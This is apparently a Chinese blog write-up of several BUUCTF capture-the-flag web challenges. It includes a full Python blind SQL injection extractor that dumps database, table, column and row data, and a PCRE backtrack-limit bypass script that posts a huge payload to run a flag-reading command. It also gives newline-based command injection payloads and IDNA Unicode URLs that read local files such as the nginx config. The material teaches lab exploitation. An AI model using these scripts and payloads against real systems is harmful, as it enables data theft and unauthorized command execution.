buuctf.web 64-96

1、[WUSTCTF2020]颜值成绩查询

考点：sql注入-盲注

题解:

(1)输入1-4都是有回显的；但是到5的时候就没有了；说明就是布尔盲注；采用异或盲注
参考链接

import time
import requests
Success_message = "Hi"
def database_name():
    db_name = ''
    for i in range(1, 10):
        begin = 32
        end = 126
        mid = (begin + end) // 2
        while begin < end:
            payload = url + "?stunum=(ascii(substr(database(), %d, 1)) > %d)" % (i, mid)
            res = requests.get(payload)
            if Success_message in res.text:
                begin = mid + 1
            else:
                end = mid
            mid = (begin + end) // 2
        if mid == 32:
            print()
            break
        db_name += chr(mid)
        print("数据库名: " + db_name)
    return db_name


def table_name():
    name = ''
    for j in range(1, 100):
        begin = 32
        end = 126
        mid = (begin + end) // 2
        while begin < end:
            payload = url + '?stunum=(ascii(substr((select(group_concat(table_name))from(' \
                            'information_schema.tables)where(table_schema=database())), %d, 1)) > %d)' % (j, mid)
            time.sleep(0.2)
            res = requests.get(payload)
            if Success_message in res.text:
                begin = mid + 1
            else:
                end = mid
            mid = (begin + end) // 2
        if mid == 32:
            print()
            break
        name += chr(mid)
        print("表名: " + name)
    table_list = name.split(",")
    for tab_name in table_list:
        column_name(tab_name)


def column_name(tab_name):
    name = ''
    for j in range(1, 100):
        begin = 32
        end = 126
        mid = (begin + end) // 2
        while begin < end:
            payload = url + '?stunum=(ascii(substr((select(group_concat(column_name))from(' \
                            'information_schema.columns)where(table_name="%s")and(table_schema=database())), %d, ' \
                            '1)) > %d)' % (tab_name, j, mid)
            time.sleep(0.2)
            res = requests.get(payload)
            if Success_message in res.text:
                begin = mid + 1
            else:
                end = mid
            mid = (begin + end) // 2
        if mid == 32:
            print()
            break
        name += chr(mid)
        print(("%s表的字段名: " + name) % tab_name)
    column_list = name.split(",")
    for col_name in column_list:
        get_data(tab_name, col_name)


def get_data(tab_name, col_name):
    data = ''
    for i in range(1, 100):
        begin = 32
        end = 126
        mid = (begin + end) // 2
        while begin < end:
            payload = url + '?stunum=(ascii(substr((select(%s)from(%s)),%d,1)) > %d)' % (
                col_name, tab_name, i, mid)
            time.sleep(0.2)
            res = requests.get(payload)
            if Success_message in res.text:
                begin = mid + 1
            else:
                end = mid
            mid = (begin + end) // 2
        if mid == 32:
            print()
            break
        data += chr(mid)
        print(("%s表的%s字段数据: " + data) % (tab_name, col_name))


if __name__ == '__main__':
    url = input("请输入url：")
    database_name()
    table_name()

2、[FBCTF2019]RCEService

考点：RCE---preg_math函数绕过

题解：

（1）提示以json格式输入;输入

{"cmd":"ls"}

回显出index.php；说明服务器使用php写的；输入其他命令发现进行了过滤，说明用到了正则表达式preg_match函数。绕过preg_match函数有两种方法

（2）方法1 ：利用preg_match函数的最大回溯次数可以绕过preg_match函数。 PCRE回溯次数绕过

查询英文PHP手册，发现php.ini中的pcre.backtrack_limit控制PCRE的回溯限制默认为1000000，python脚本

import requests
payload = '{"cmd":"/bin/cat /home/rceservice/flag","zz":"' + "a"*(1000000) + '"}'
res = requests.post("http://78850bfd-7aa8-4e32-bfab-181f587057c5.node4.buuoj.cn:81/", data={"cmd":payload})
print(res.text)

（2）利用preg_match函数只匹配第一行，所以可以利用换行符%0A来构造payload。

/?cmd={%0A"cmd": "ls /home"%0A}
/?cmd={%0A"cmd": "/bin/cat /home/rceservice/flag"%0A}

3、[SUCTF 2019]Pythonginx

考点：unicode转IDNA域名分割漏洞

题解：

（1)题目源码

@app.route('/getUrl', methods=['GET', 'POST'])
def getUrl():
    url = request.args.get("url")
    host = parse.urlparse(url).hostname
    if host == 'suctf.cc':
        return "我扌 your problem? 111"
    parts = list(urlsplit(url))
    host = parts[1]
    if host == 'suctf.cc':
        return "我扌 your problem? 222 " + host
    newhost = []
    for h in host.split('.'):
        newhost.append(h.encode('idna').decode('utf-8'))
    parts[1] = '.'.join(newhost)
    #去掉 url 中的空格
    finalUrl = urlunsplit(parts).split(' ')[0]
    host = parse.urlparse(finalUrl).hostname
    if host == 'suctf.cc':
        return urllib.request.urlopen(finalUrl).read()
    else:
        return "我扌 your problem? 333"

（1）就是如何绕过IDN转换

绕过检测方法1：

在unicode中有一种字符℀(U+2100)，当IDNA处理此字符时，会将℀变成a/c，因此当你访问此url时，dns服务器会自动将url重定向到另一个网站

?url=file://suctf.c℆sr/local/nginx/conf/nginx.conf
file://suctf.c℆sr/fffffflag

方法2：找一些其他的unicode符号经过punycode 转为 c 的字符；

from urllib.parse import urlparse,urlunsplit,urlsplit
from urllib import parse
def get_unicode():
    for x in range(65536):
        uni=chr(x)
        url="http://suctf.c{}".format(uni)
        try:
            if getUrl(url):
                print("str: "+uni+' unicode: \\u'+str(hex(x))[2:])
        except:
            pass


def getUrl(url):
    url = url
    host = parse.urlparse(url).hostname
    if host == 'suctf.cc':
        return False
    parts = list(urlsplit(url))
    host = parts[1]
    if host == 'suctf.cc':
        return False
    newhost = []
    for h in host.split('.'):
        newhost.append(h.encode('idna').decode('utf-8'))
    parts[1] = '.'.join(newhost)
    finalUrl = urlunsplit(parts).split(' ')[0]
    host = parse.urlparse(finalUrl).hostname
    if host == 'suctf.cc':
        return True
    else:
        return False

if __name__=="__main__":
    get_unicode()

4、[0CTF 2016]piapiapia

考点：反序列化字符串逃逸

题解：参考链接

陆续更新中！！！！